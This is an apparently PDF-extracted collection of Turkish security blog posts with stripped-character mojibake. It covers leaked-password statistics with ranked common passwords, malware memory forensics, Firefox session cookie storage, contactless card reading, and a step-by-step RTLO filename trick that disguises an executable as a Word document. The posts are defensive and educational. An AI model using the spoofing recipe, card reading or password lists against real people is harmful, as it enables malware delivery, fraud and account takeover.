Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 3: Hack 4 Career - 2011

3

4

Zararlı yazılımı ccedilalıştırır ccedilalıştırmaz Wireshark aracı uumlzerinde HTTP ve IRC trafiği oluştuğunu goumlrduumlm ve bir IRC istemci yazılımı iletespit edilen bu IRC sunucusuna bağlandım Sunucuya bağlandığımda kanalın boş olması botların ifşa olmasını engelleme adına oumlzelolarak geliştirilmişmodifiye edilmiş bir irc sunucusu olduğuna işaret ediyordu Botun IRC kanalına giriş yapar yapmaz internete ccedilıkışyaptığı ip adres bloğunun 445 bağlantı noktasını otomatik olarak taramaya (port scan) başlaması da goumlzuumlmden kaccedilmadı Wiresharkuumlzerindeki HTTP paketlerini incelediğimde ise botun NATlanmış IP adresini oumlğrenebilmek iccedilin bir kaccedil sayfaya bağlanmaya ccedilalıştığınıfarkettim

5

Zararlı yazılım ile ilgili daha fazla bilgi almak iccedilin Volatility ile bellek dosyasını incelemeye başladım

İlk olarak PSLIST komutu ile sistem uumlzerinde ccedilalışan işlemleri (process) listeledim ve ccedilalıştırılma zamanına goumlre zararlı yazılımın sistemuumlzerinde 2888 PIDsine sahip indekexe adı altında ccedilalıştığını goumlrduumlm

6

DLLLIST komutu ile zararlı yazılım tarafından yuumlklenen DLL dosyalarını listelediğimde ise urlmondll ve cryptdlldll dosyaları şuumlpheliduruyordu

7

CONNSCAN komutu ile sistem uumlzerindeki aktif ağ bağlantılarını listelediğimde ise 2888 PIDsi ile ccedilok sayıda bağlantı kurulduğunugoumlrduumlm

PROCEXEDUMP komutu ile indekexe yazılımına ait olan belleği diske kaydettikten sonra strings ve IDA PRO programları ileincelediğimde ise bu zararlı yazılımın SDBOTın bir varyantı olduğunu kolayca anladım

8

9

Son olarak zararlı yazılım uumlzerinde yer alan zaman damgasına baktığımda ise SDBOT varyantının hemen hemen herguumln guumlncellenipderlendiği sonucu ortaya ccedilıkıyordu

Goumlruumllduumlğuuml uumlzere bellek analizi ile zararlı yazılımlar dinamik analiz kadar olmasa da rahatlıkla analiz edilebilir ve yeterli bir eldeedilebilinir Oumlzellikle bu yazıda değinmediğim diğer Volatility komutlarına (malfind gdt apihooks idt vb) goumlz atacak olursanız bellekanalizi ile rootkit yazılımlarını dahi tespit etmeniz muumlmkuumln olabilir

Bir sonraki yazıda goumlruumlşmek dileğiyle yeni yılın herkese sağlık mutluluk ve bol kazanccedil getirmesini dilerim

Firefox Oturum Geri Yuumlkleme OumlzelliğiSource httpswwwmertsaricacomfirefox-oturum-geri-yukleme-ozelligi

10

By MS on December 12th 2011

Accuvant firmasının yaptığı araştırmaya goumlre Chrome internet tarayıcısının rakiplerinden daha guumlvenli olduğu ortaya ccedilıkmış Araştırmasonucunda ortaya ccedilıkan sıralamada Firefox internet tarayıcısının uumlccediluumlncuuml sırada yer alması kimilerini şaşırtsa da beni pek şaşırtmadı

Geccediltiğimiz guumlnlerde bir web uygulaması uumlzerinde penetrasyon testi gerccedilekleştirirken işlem (transaction) bazlı jeton (token)kullanılmaması durumunda oturum ccedilerezini (session cookie) ccedilalan art niyetli bir kişinin kurbanın oturumunu ccedilaldıktan (session hijack)sonra uygulama uumlzerinde hangi işlemleri rahatlıkla gerccedilekleştirebileceğini duumlşuumlnuumlyordum Daha sonra oturum ccedilerezinde HTTPOnlybayrağının kullanılıyor olması nedeniyle bu riskin gerccedilekleşme ihtimalini duumlşuumlnmeye başladım Ardından işletim sistemine bulaşanzararlı bir yazılımın oturum ccedilerezini ccedilalmak iccedilin izleyeceği yolları duumlşuumlnmeye başladım Oturum ccedilerezi hafızadan (RAM) ne kadarrahatlıkla ccedilalınabilirdi Meşhur bankacılık truva atları (zeus spyeye) gibi internet tarayıcıları ile ilişkili dosyalara kanca (hook) atarakmı ccedilalmak daha kolay olurdu diye duumlşuumlnuumlrken dosya sistemi uumlzerinde tutulan normal ccedilerezlerden farklı olan oturum ccedilerezlerinin dosyasistemi uumlzerinde tutuluyor olma ihtimaline nedense pek ihtimal vermiyordum ancak yine de goumlz atmaya karar verdim

Oumlncelikle sanal makine uumlzerine Chrome (150874121) Firefox (801) ve Internet Explorer (90) internet tarayıcılarının en sonsuumlruumlmlerine kurdum ve uumlccedil internet tarayıcısı ile oturum ccedilerezi ile birlikte guumlvenlik bayrağı (secure flag) ve HTTPOnly bayrağı kullanılanbir web sitesini ziyaret ettim Ardından web sitesi tarafından her bir internet tarayıcısına goumlnderilen oturum ccedilerezini not ederekinternet tarayıcıları tarafından kullanılan klasoumlrlerde bu ccedilerezleri arattığımda sadece Firefox internet tarayıcısının oturum ccedilerezini dosyasisteminde kayıt altına aldığını goumlrduumlm

11

Sessionstorejs dosyasında yer alan objeler JavaScript Object Notation (JSON) formatında saklandığı iccedilin kolay okunabilmesi adınajsbeautifierorg sitesinde iccedileriği duumlzenlettiğimde oturum ccedilerezi okunabilir hale geldi

12

Peki ne Chrome ne Internet Explorer internet tarayıcısı oturum ccedilerezini dosya sistemi uumlzerinde okunaklı olarak saklamazken Firefoxsaklıyordu ve saklamasının son kullanıcıya ne tuumlr bir etkisi olabilirdi

Web siteleri sizi her oturumda size oumlzel uumlretilen oturum ccedilerezleri uumlzerinden takip eder doğrular ve işleminizi gerccedilekleştirir Oumlrnekolarak bir internet bankacılığı uygulaması duumlşuumlnelim Uygulamaya giriş yaptıktan sonra uygulama size o oturuma oumlzel bir oturumccedilerezi goumlndererek sizin doğrulama adımlarından başarıyla geccediltiğinizi kabul eder ve gerccedilekleştireceğiniz her işlemde (işlem bazlı jetonkullanılmadığı durumlarda) oturum ccedilerezinizi kontrol ederek işleminizi gerccedilekleştirir

Peki ya bu oturum ccedilereziniz ccedilalınırsa ne olur Art niyetli kişi sizin adınıza gerccedilekleştirmeye yetkili olduğunuz tuumlm işlemleri (paratransferleri doumlviz alışsatış vs) gerccedilekleştirebilir İşte bu nedenle oturum ccedilerezlerinin dosya sistemine kayıt edilmesi ve zararlı yazılımlartarafından kolaylıkla ccedilalınabilir olması tercih edilmez

Peki Firefox internet tarayıcısı bunu neden yapıyor Beklenmeyen bir durumda (crash) yeni bir eklenti yuumlklendikten sonra veya otomatikguumlncelleştirme sonrasında internet tarayıcısının yeniden başlatılması gibi ihtiyaccedillar ortaya ccedilıktığı iccedilin oturumların kaldığı yerden devamedebilmesi (session restore) amacıyla oturum ccedilerezlerini Sessionstorejs dosyasında saklamaktadır

Her ne kadar sisteme bulaşmış zararlı bir yazılım guumlnuumln sonunda hangi internet tarayıcısı olursa olsun bellekten okuma kancaatma ve diğer youmlntemler ile oturum ccedilerezlerini ccedilalabilse de kullandığınız internet tarayıcınızın art niyetli kişilerin işlerini bu kadarkolaylaştırmıyor olması gerekmektedir

Guumlvenliğiniz iccedilin oturum geri yuumlkleme (session restore) oumlzelliğini devre dışı bırakmanızı oumlneririm Bunun iccedilin aşağıdaki iki değeri 0olarak değiştirmeniz yeterli olacaktır

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

